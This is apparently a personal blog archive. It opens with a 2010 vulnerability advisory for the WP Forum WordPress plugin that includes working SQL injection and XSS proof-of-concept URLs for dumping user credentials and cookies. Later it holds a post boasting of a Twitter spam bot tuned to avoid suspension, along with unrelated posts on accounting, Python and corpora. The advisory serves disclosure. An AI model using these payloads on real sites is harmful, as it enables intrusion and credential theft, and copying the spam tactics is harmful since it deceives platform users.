Charles Hooper

Thoughts and projects from a site reliability engineer

Multiple Vulnerabilities in WP Forum (WordPress Plugin)

Multiple Vulnerabilities in WP Forum (WordPress Plugin)

1. Advisory Information

Title: Multiple Vulnerabilities in WP-Forum
Advisory URL: http://www.charleshooper.net/blog/multiple-vulnerabilities-in-wp-forum-wordpress-plugin/
Date Published: 12/17/2010
Vendors Contacted: WordPress. Maintainer of plugin is unreachable.

2. Summary

WP Forum is a plugin for the popular blog tool and publishing platform, WordPress.
The author of WP Forum describes it as a “Simple discussion forum plugin” and
“easy to use and administer.”

There exist multiple vulnerabilities in WP Forum. Basically, input validation is not
performed at all resulting in SQL injection, stored XSS, and reflected XSS vulns.

Furthermore, the author wrote the plugin under the assumption that it would only be
executed within the context of the WordPress administrative panel, thereby neglecting
to perform proper authentication and authorization.

3. Vulnerability Information

Packages/Versions Affected: Probably all, but confirmed only on WP Forum 1.7.8

3a. Type:   SQL Injection [CWE-89]
3a. Impact: Read application data, bypass protection mechanism,
modify application data. There are multiple SQL injections present
in WP Forum. The most prominent of which is the SQL injection present
in the `group_login` functionality. Prior to logging in, an attacker
can retrieve each group’s passwords due to the vulnerability listed
below (3b).

3b. Type:   Plaintext Storage of a Password [CWE-256]
3b. Impact: Password is easily retrieved from database

3c. Type:   XSS (Stored or Reflected) [CWE-79]
3c. Impact: Execute unauthorized code or commands

3d. Type:   Auth Bypass via Direct Request [CWE-425]
3d. Impact: Many or all of the administrative functions assume they are running
in the context of the WordPress administrative section. As a result,
they often do not check that the user is authenticated or authorized
to perform a particular action. Example functionality includes adding
or removing forum moderators and deleting forums. This vulnerability
could lead to information exposure, privilege escalation, or data loss.

3e. Type:   Information Exposure Through Sent Data [CWE-201]
3e. Impact: `sendmail.php` discloses users’ email addresses by accepting a user-
provider “user” variable and returns a hidden tag containing
that user’s email address.

3f. Type:   External Control of Assumed-Immutable Web Parameter [CWE-472]
3f. Impact: `sendmail.php` accepts user-provided input allowing it to be used as
an email relay

4. PoC & Technical Description

Due to the number of vulnerabilities in this package, I will not discuss each one
individually. Instead, here are some sample POCs. Many more exploitable vulns exist
in this package than what I am providing here.

4a. http://path.to/wordpress/?page_id=&forumaction=group_login&group_id=0 UNION SELECT CONCAT_WS(CHAR(58),user_login,user_pass,user_email) FROM wp_users LIMIT 1 #
or (goes for all POCs): http://path.to/wordpress/?forumaction=group_login&group_id=0 UNION SELECT CONCAT_WS(CHAR(58),user_login,user_pass,user_email) FROM wp_users LIMIT 1 #
4b. N/A
4c. http://path.to/wordpress/?forumaction=group_login&group_id=alert(document.cookie);
4d. http://path.to/wordpress/wp-content/plugins/wpforum/wp-forum-manage.php?editgroupsubmit=true&group=&groupname=&passwd=
4e. http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php?user= (email address will be in HTML source)
4f. POST ‘submit=true&sender=&email=&message=&subject=&replyto=
to http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php (untested)

5. Report Timeline

12/10/2010 Initial email sent to WordPress security.
12/10/2010 Maintainer not yet contacted as project appears abandoned and maintainer
does not have listed contact information.
12/17/2010 No reply from WordPress security. Advisory released.

6. References

6a. The WordPress Plugin page for WP Forum:

http://wordpress.org/extend/plugins/wpforum/

6b. The WordPress Profile page for the author of the plugin:

http://profiles.wordpress.org/users/fahlstad/

6c. The plugin author’s website:

http://www.fahlstad.se/

7. Legalese

This vulnerability report by Charles Hooper < chooper@plumata.com > is
licensed under a Creative Commons Attribution-NonCommercial-ShareAlike
3.0 Unported License.

8. Signature

Public Key: Obtainable via pool.sks-keyservers.net

Cost Behavior Analysis Calculator

One of the projects I’ve been working on lately is my Cost Behavior Analysis Calculator.

Cost behavior analysis is the process of dividing a mixed cost into its variable and fixed components. Doing this can be a long and tedious process. This process, when done manually, involves:

  1. Determining which metric or activity drives costs. A common example in manufacturing is “machine hours.” Using this technique, you could determine how much each “machine hour” affects your power bill.
  2. Making a scatter graph of your data. When you’re plotting your data, what you’re looking for is that a linear relationship exists between your cost driver and your costs. If a linear relationship doesn’t exist, then it isn’t a cost driver – pick a new metric and try again.
  3. Fitting a line to the scatter graph. When working on paper, it’s easier to use the high-low method. However, this method is considered inaccurate as it only uses two points from your entire data set. Not to mention, the highest and lowest points of these data sets are usually considered “atypical.” The Cost Behavior Analyzer uses least-squares regression to fit a more accurate line.
  4. Measure your slope and y-intercept. The slope of the line is your variable cost and the y-intercept is your fixed cost.

I developed the Cost Behavior Analyzer because I found that doing this work manually was tedious and repetitive. I’m making it available here so others can benefit from its use. Managerial accountants, financiers, business owners, and entrepreneurs alike should all know what’s driving their costs and how to accurately predict them.

Try the Cost Behavior Analyzer out now!

Twitter vs Erotica: Your Corpora’s Source Matters

Dictionary © uair01; some rights reserved.

As a result of my now defunct project, BookSuggest, I’ve built a fairly large corpus that has been seeded entirely from Twitter. This corpus weighs in at:

  • 16,680,000 documents (tweets)
  • 1,970,165 unique (stemmed) words
    (Red flag: Oxford Dictionary suggests there’s an estimated 250,000 words in the English language. This discrepancy is the result of my failure to filter Tweets based on language, the fact that usernames were included in the count, and the fact that people “make words up.” Also, “haha” becomes one word while “hahahaha” becomes another.)
  • 83,758,872 words total.

When I look at these numbers, I often think about how the source documents a corpus/histogram is derived from affects the distribution of its term frequencies. The most obvious example is language. A French corpus will never come close to an English corpus. A less obvious example is subject matter. For example, a corpus derived from English literature will have a different term distribution than a corpus derived from an English medical journal. Common terms will have similar frequencies, but there will be biases towards terms that are domain-specific.

To demonstrate, I scraped the “Erotica” section of textfiles.com and built a corpus based on the data there. The resulting corpus is composed of:

  • 4,337 documents
  • 50,709 unique (stemmed) words
  • 10,413,715 words total.

Notes on Term Counting

  • Words that had a length of less than 4 characters were discarded
  • Words were then stemmed using the Porter Stemming algorithm
  • There may be some slight differences between how words were counted in both corpora, based on minor programming differences

The Data

Finally, here are the term frequencies with the obvious domain-specific terms in bold:

Corpus Seeded from Twitter

![Counts of Top 20 Terms from Twitter Corpus][6]

  1. that (0.84%)
  2. just (0.70%)
  3. with (0.69%)
  4. thi (0.68%)
  5. have (0.65%)
  6. your (0.61%)
  7. like (0.56%)
  8. love (0.54%)
  9. follow (0.45%)
  10. what (0.44%)
  11. from (0.36%)
  12. haha (0.35%)
  13. good (0.34%)
  14. para (0.34%)
  15. will (0.32%)
  16. when (0.30%)
  17. know (0.30%)
  18. want (0.30%)
  19. about 0.30%)
  20. make (0.30%)

Corpus Seeded from Erotica

![Counts of Top 20 Terms from Erotica Corpus][7]

  1. that (1.83%)
  2. with (1.42%)
  3. into (0.76%)
  4. down (0.70%)
  5. then (0.66%)
  6. back (0.66%)
  7. from (0.65%)
  8. thi (0.65%)
  9. hand (0.64%)
  10. were (0.59%)
  11. look (0.58%)
  12. have (0.58%)
  13. cock (0.57%)
  14. like (0.57%)
  15. over (0.57%)
  16. thei (0.56%)
  17. your (0.56%)
  18. what (0.55%)
  19. said (0.55%)
  20. could (0.54%)

You’ll note that the Twitter corpus had a heavy bias towards the term “follow” whereas the Erotica corpus shows an overwhelming use of the term “cock” (Writers: Use synonyms.)

[6]: http://chart.apis.google.com/chart?chxl=0: that just with thi have your like love follow what from haha good para will when know want about make&chxr=0,0,703297&chxt=x&chbh=a,4,10&chs=600x200&cht=bvg&chco=4D89F9&chds=0,703297&chd=t:703297,582988,581346,573197,547218,513823,467673,455264,378187,367112,302254,296974,286671,283887,272176,254419,252303,251673,251325,248572&chtt=Counts of Top 20 Terms from Twitter Corpus
[7]: http://chart.apis.google.com/chart?chxl=0: that with into down then back from thi hand were look have cock like over thei your what said could&chxr=0,0,190543&chxt=x&chbh=a,4,10&chs=600x200&cht=bvg&chco=F889F9&chds=0,190543&chd=t:190543,148204,78688,72452,69045,68642,68164,67998,66826,61787,60236,60179,59622,59357,58856,58760,57851,57670,57348,55739&chtt=Counts of Top 20 Terms from Erotica Corpus

Practical Reasons Why This Is Important

This is important because if I were to build a domain-specific search-engine, I would be better off  seeding my corpus from domain-specific content. If I don’t, my relevance (tf-idf) scores will be inaccurate. For example, an Erotica-specific search engine should decrease the weight for the term “cock” strictly because it has a very high document frequency and is therefore less-significant. Meanwhile, a Twitter-specific search engine should discount the weight of “follow.”

Conclusion

To conclude, the subject matter of a document set will create a bias towards domain-specific terms in the document set’s histogram of term frequencies. If you are calculating relevance for any particular document set, you should use a corpus derived from that document set. In other words, if you can, try not to re-use your corpora!

WordPress Auto Upgrade and “Dumb” Permissions

One of the nice features about WordPress is its ability to upgrade and install plugins on the fly. This is nice because now you don’t need to be bothered with the hassle of downloading plugins, unzipping their contents, and transferring them to your web server.

Unfortunately, the way in which WordPress determines if it has the appropriate permissions to upgrade plugins is implemented poorly. When WordPress doesn’t think it has permission, the admin panel will instead prompt you for FTP login information. This is a problem because sometimes WordPress will do this falsely even if it does have proper permissions.

The Problem

The way WordPress tries to guess if it has proper permissions is very primitive. Instead of using PHP’s is_writable, WordPress instead compares the web server’s User ID with the User ID of the wp-content directory’s owner*. While this might work for a large number of cases, it doesn’t work in all of them (including mine).

* It’s actually slightly more complicated than this, but the effect is the same.

The Environment

I run WordPress 3.x on Ubuntu 10.04 LTS under Lighttpd and PHP5-cgi. Lighttpd runs as user www-data and group www-data. If I wanted to let WordPress’ auto-detection of permissions work, I would have to change the owner of my website directories to www-data. This doesn’t fly with me, because I also want my user to have easy access to my document root and don’t like the idea of my data being user-owned by my webserver user.

The Solution

Instead of bending over to WordPress’ permission issues, I was able to perform the following simple steps to have auto-installing/updating plugins and themes *without *changing user ownership of my web files.

  1. sudo chgrp -R www-data /path/to/wp/wp-content

    This changes group ownership of wp-content and all sub-directories to be group-owned by your webserver user. wp-content is where WordPress stores plugins, themes, cache files, and (AFAIK) file uploads.

  2. sudo chmod -R g+w /path/to/wp/wp-content

    This makes wp-content and all of its sub-directories group-writable.

  3. sudo chmod g+s /path/to/wp/wp-content

    This, g+s, is known as setgid. This causes newly-created files to be group-owned by wp-content’s owning group, in this case www-data.

  4. Finally, add the following to the bottom of wp-config.php. This is an override built into the WordPress code. For more information, take a look at wp-admin/includes/file.php’s function get_filesystem_method.

Enable direct file updating in wp-config.php
1
2
3
4
/* Force direct file updating
- http://www.charleshooper.net/blog/wordpress-auto-upgrade-and-dumb-permissions/
*/
define('FS_METHOD', 'direct');

So there you have it. WordPress does a poor job of properly detecting file permissions and, in some cases, needs to be overridden. If you’re still having problems after this, let me know and I will do my best to help you.

RIP BookSuggest

BookSuggest, the web-based book recommendation engine, is officially dead. I’ve been treating BookSuggest as the lowest of priorities for quite some time now and I’m more than happy to declare this project a failure. Here is a brief recap of BookSuggest’s history.

Before BookSuggest was a web application, I used to spam unsuspecting Twitter users with book recommendations. Eventually, Twitter stepped up their anti-spam stance and suspended my spam account. I retired the project for a while until one day I decided to build a web application around the recommendation technology I was using.

This technology was simply scoring words in a user’s timeline, taking the four highest-scoring words, and then passing them to an Amazon ItemSearch query. More specifically, the type of search in use was what Amazon calls a TextStream search. This search method is what allowed me to get book recommendations, even if the search terms provided weren’t all that great. Without it, it’s not unlikely that my ItemSearches wouldn’t return any results at all.

So imagine my surprise when I read the following in Amazon’s API documentation:

Due to low usage, the Product Advertising API operations and response groups listed below will not be supported after October 15, 2010:


Additionally, due to low usage, we will be discontinuing Multiple Operation Requests and the TextStream search parameter.

Oh, shoot!

Financially, it makes sense for me to cut my losses here. Back when I was still spamming Twitter, I was pulling over $100/mo. Through the web-app, my referral fees are much smaller. As of this moment, I have a balance of just $9 with Amazon and haven’t cashed out since the start of the project.

Some numbers:

  • Unique Twitter users: 393
  • Recommendations made: 611
  • Documents in corpus: 17,458,549
  • Unique words in corpus: 1,970,165
  • Top 5 words in corpus: that, just, with, this, have

RIP BookSuggest!

Code Responsibly: What’s Best for Your Clients?

We programmers have a natural affinity for writing and using our own code. You can’t really blame us; this is akin to gardeners who prefer to eat vegetables they grow, or brewers who prefer to drink their own beer. However, this oftentimes leads to a frequent re-invention of the wheel. While this isn’t always a bad thing, it doesn’t usually benefit our clients and here’s why:

  1. **Increased development time. **If a client is paying you hourly, why should they pay for you to re-invent a solution that already exists? Why write a new CMS if WordPress will do? When you write a new CMS from scratch for a client, you are increasing their development costs.
  2. **Freedom in hosting. **It’s no coincidence that many web developers also host their projects as well. This is fine for larger applications, but for the majority of the client work out there your clients should have the freedom to a broad range of hosting options. Vendor lock-in is a terrible thing.
  3. **Post-development support. **If a client needs customizations done to the code base, they should be able to solicit the work from almost any developer. Certainly you would want preference in these solicitations, but there shouldn’t be any clients who are stuck with you. When you use your own custom solution, you are increasing your clients’ maintenance costs.

I’m not saying that you shouldn’t ever write new code. What I am saying is that your responsibility to the client is to use the best tools for the job and to put together the best solution for them that you can. Sometimes this means flexing your coding muscles and sometimes this means humbly setting up existing software such as WordPress. So please, write new code conservatively and responsibly.

Validating Data With New-Style Classes in Python

Every once in awhile in my reading I come across a minor reference to what pythonistas refer to as new-style classes. One of the nice things about new-style classes is the `property` decorators. These property decorators allow you to build getter and setter methods to access object attributes. This is pretty awesome because now you can perform validation at the model/class level whenever you assign a value to a property of an object.

e.g., In one of my projects, I have an attribute named timestamp that takes a `datetime` object. I was concerned about receiving incorrect types from my input because there are alot of ways a programmer can represent the concept of time. Some realistic possibilities of invalid types in my case are:

  • `time` objects from the time module
  • `string` objects that contain the date and time (and various possible formats)
  • `float` or `int` objects that contain a unix timestamp

With a setter method, you can test that the new value being assigned to an attribute is the correct type before assigning it. You can also throw an exception if it’s not. In other words, you can do something like this:

from datetime import datetime

class SomeObject(object):    # new-style classes must be subclassed from object
    _timestamp = None

    @property
    def timestamp(self):
        return self._timestamp

    @timestamp.setter    # the prefix must match the read-only getter func name
    def timestamp(self,value):    # the func name must match the read-only getter func name
        if not isinstance(value, datetime):
            raise ValueError(“Timestamp can only be an instance of Datetime”)
        self._timestamp = value

Go ahead and try it!

The HN Effect in Numbers

For the unfamiliar, I wrote an article about a week and a half ago titled How I Made Money Spamming Twitter with Contextual Book Suggestions and promised that I would follow up with a post on the type of traffic I received. Not only did the article get to be pretty popular with the Hacker News crowd, republished in Silicon Alley Insider, and make me the recipient of a handful of wonderful emails but I even got to visit tracked.com’s engineering team and get schooled on machine learning techniques and A.I. (hi folks!) Something relevant I should mention is that, just a day before, I had migrated my Posterous blog from one domain to its current place, blog.charleshooper.net. To anyone who’s curious, this was a totally painless process. Set up DNS first, update your Posterous settings, and set up 302 redirects so your links don’t break. Social Link-Sharing
Despite finishing my article at 1:00 AM, I thought it was pretty well-written and I wanted my story to be heard, so I decided to get a full night’s sleep, proof-read it in the morning, and submit the link to Reddit, Digg, and Hacker News. Besides the obvious benefits of proof-reading the article while fully-rested, I also recognized that most link-sharing sites weight votes based on time (or rather, some product of votes/time maybe) so submitting my article in the morning meant that it would first show up at the beginning of what I believe to be peak usage. So how’d I do? Reddit hated it.

Digg didn’t care.
And Hacker News loved it!
I also make use of Posterous’ “autopost” features and have all my new submissions get posted to Twitter and Facebook. According to Posterous, there were over 77 retweets of my article (most likely from the tweet storm that the Silicon Alley Insider bot and HN bots started) and 7 “likes” on Facebook. Traffic
According to Google Analytics, I’m not very popular. Before publishing my article, I received an average of about 30 visits a day. On the day I published my article, I observed a surge of over 4,600 visitors. From there, the numbers declined daily at a rate that looks very much like exponential decay. It took 10 days for my traffic to return to normal, but that day was a Sunday and the following Monday was almost twice as high (62 visits). For the number geeks, the set of numbers beginning with the peak is (4652, 2688, 1065, 452, 206, 138, 105). I got close with the expression f(x) = 4652e^(-0.6x) but that isn’t quite right (maybe I should treat my average visits as a constant.) Update: I’ve gotten much closer with f(x) = 2658e^(-0.94x) 30

Over the time period, my article received over 9,000 unique page views with a bounce rate of over 90% (~93% exit rate.) I remember reading an article a little while ago that stated, on single-page use cases, the bounce rate will always be close to the exit rate unless the analytics software “phones in” after some period of time to register the visit as something other than a bounce. I use Google Analytics and, unless I find out otherwise, I don’t think it does this (although, it does measure “time on page” so maybe it does and Google’s idea of a bounce is different than mine.)


Sources
My largest source of traffic was referring websites making up over 70% of it. Less than 2% was from search engines and I don’t even think that any of it was destined for my article.
As for the referring websites, I received traffic from all over. However, most of it was from Hacker News, TechMeme.com, and Google.com. I looked into “google.com / referral” versus “google.com / organic” and the referrals mostly consisted of visitors using Google Reader. What isn’t shown below is the 113 other referring sites. The “daemonology.net” referral is a result of HN Daily. As you can see, my top sources are primarily seeded by social media and social link-sharing websites.
Conclusion
To conclude, don’t under-value the social sites. If you want some organic link juice then utilize the “chatty” sites like Facebook and Twitter as well as the link-sharing sites such as Hacker News, Reddit, and Digg. There is a hidden benefit to putting yourself out there and asking for alot of attention: You will ensure that your articles, blog posts, and research are high-quality resources of useful information. Essentially, you end up treating each blog post as you would any startup. Experiment first. Create value second. The rest (profit, respect, esteem) comes easy.

How I Made Money Spamming Twitter With Contextual Book Suggestions

Two winters ago I left a position as a system administrator that was paying pretty well and moved cross-country to a region with less jobs than where I moved from. Three months later, I was still unemployed, broke, and bored. I was talking to my good friend Japhy on IRC one day and he was explaining to me how the tf-idf algorithm works. For reasons involving boredom more than any other reason, I dreamed up an idea: I would write software that would take a given document and generate book suggestions based on its content.

I think that most programmers would agree with me that we put in longer hours on code when we’re not working for anybody. We don’t stop learning, either. To us, unemployment is a brief sprint of academia spent in our home office, the local coffee shop, or our parent’s house. My imagination dreamed up this fairly straightforward process:

  1. Take a given document and calculate tf-idf scores on all terms
  2. Select X number of the highest scoring terms
  3. Pass these high-scoring terms to an Amazon ItemSearch query
  4. Receive a list of recommended books (with URLs) from Amazon

I had already written multiple Twitter bots by this time so I decided to just use some of my existing code to poll Twitter’s search API. Essentially, the “documents” I mentioned above were actually tweets containing the terms “book” or “books.” Two and a half days later I had a working prototype that could generate a book recommendation from a given tweet. It was at this time that I added steps 5 and 6:

Tag URLs returned from Amazon’s ItemSearch with an affiliate ID; and
Reply to the tweeting user with their new book suggestion

Four months later and I had generated over $7,000 in sales for Amazon with over $400 commission for myself. Obviously, the commission I was making wasn’t livable but it was a nice addition to my then-depleting savings. Had I decided to scale out my operation, I could have made much more. My benchmark is at four months because that’s how long I went before being suspended. My conversion rate? 0.13%! While seemingly low, this number is very high when compared to email spam. However, it’s important to note that email spam is subject to various filtering technologies. twitter-spam-earnings.png A fair amount of the time I share this story, people are more impressed with the fact that I went 4 months before getting suspended. The truth is, I had a lot of throttling built into my spam bot. The factors I think are important to point out are:

  1. Twitter’s Terms of Service at that time basically only outlawed “unsolicited replies,” nothing that really attacked targeted spam.
  2. Twitter’s anti-spam stance did exist in writing (only in the help site,) but I do not think they were actively enforcing their policies.
  3. My recommendations were contextual and, unless you looked at my bot’s timeline and tweet count, looked legitimate (most of the time.) In other words, I was tweeting book suggestions to people who were already talking about books.
  4. I recorded the usernames of everyone I sent recommendations to and would only @mention them once.
  5. I built in a “chattiness” rate limiting function. This was to distribute my spam throughout a whole hour (due to Twitter’s rate limiting) more than anything.

twitter-suspended.png

While it only lasted a short while, I had alot of fun and made a little bit of money spamming Twitter.

The second re-incarnation of this project turned into BookSuggest, a website for recommending books based on a person’s Twitter feed. I haven’t put alot of effort into promoting it, but my conversion rate is much lower now that I’m not pushing the links in anyone’s face.

Try it out and comment here – what did BookSuggest tell YOU to read?

What Are the Generally Accepted Accounting Principles (GAAP)?

This entry is part 3 of 8 in the seriesIntro to Financial Reporting

Previously, we discussed the various regulations and regulatory bodies that govern financial reporting. We will now turn to the Generally Accepted Accounting Principles (GAAP) to explain the basic principles used in accounting. In particular, we will discuss the cost, revenue recognition, matching, and full disclosure principles.

While it may sound redundant, the cost principle means that “accounting information is based on an actual cost” (Wild, Shaw, & Chiappetta, 2009, p. 9). In other words, everything is treated as having the value of what was paid for it. So what happens when businesses make a trade or don’t purchase with cash (businesses have been known to buy each other with a mix of cash, stocks, and bonds)? “If something besides cash is exchanged … cost is measured as the cash value of what is given up or received” (Wild, Shaw, & Chiappetta, 2009, p. 10). That caveat here is that if you buy something and get a good deal, such as buying a $7000 asset for $5000, the item will be recognized in your accounting system as having a value of $5000. This is to ensure that the accounting information remains objective (Wild, Shaw, & Chiappetta, 2009, p. 10). Next, we will look at the revenue recognition principle.

The revenue recognition principle determines how and when a company will recognize (record) revenue (Wild, Shaw, & Chiappetta, 2009, p. 10). The primary concept of the revenue recognition principle is that “Revenue is recognized when earned” (Wild, Shaw, & Chiappetta, 2009, p. 10). This doesn’t necessarily mean when the customer or client pays for their good or service, but when the good or service is actually sold (such as on credit). For example, if I configured someone’s network (a service) at an hourly rate, I would be required to recognize and record this earned revenue as soon as the work is done; this is usually done crediting accounts receivable (most accounting software does this automatically when generating an invoice.) This principle is intended to keep companies from recognizing revenue too early to look more profitable while also ensuring that they don’t recognize revenue too late to look less profitable than they really are (Wild, Shaw, & Chiappetta, 2009, p. 10). Now let’s look to the matching principle.

The matching principle dictates that a company must report its expenses in the period that they generated the revenue reported (Wild, Shaw, & Chiappetta, 2009, p. 10). Let’s say, for example, that a company buys 10 pounds of raw material, uses it to make 10 widgets, and then sells 5 of those widgets. Under the matching principle, the company would report the expenses (or, in this case, Cost of Goods Sold) incurred to make the 5 widgets it sold. The remaining 5 (that are now sitting in inventory), would not have their expenses/COGS reported until they too were sold. Finally, we turn to the full disclosure principle.

The full disclosure principle is probably the most basic yet most important principle. The full disclosure principle states that a company must “report the details behind financial statements that would impact users’ decisions” (Wild, Shaw, & Chiappetta, 2009, p. 10). Oftentimes, these details are reported in footnotes of a company’s financial statements or annual reports (Wild, Shaw, & Chiappetta, 2009, p. 10). An example of this from current events is Dell’s recent trouble with the SEC. Dell’s recent trouble was partially the result of receiving money from CPU manufacturer Intel and disguising that money as sales (why they hid it is another topic entirely). Users of Dell’s financial reports were led to believe that this extra money was the result of sales. When Intel stopped paying Dell this “incentive money,” Dell then took extra steps to falsify their financial statements to hide the fact that their revenue decreased. Save for the anti-trust violation with Intel, if Dell had just fully disclosed the revenue it was receiving from Intel they may have never felt the pressure to hide the fact that the payments stopped.

In conclusion, the Generally Accepted Accounting Principles (GAAP) are made up of four basic principles. In particular, we discussed the cost, revenue recognition, matching, and full disclosure principles.

Chiappetta, B., Shaw, K., Wild, J. (2009). Principles of Financial Accounting (19th ed.). McGraw-Hill/Irwin.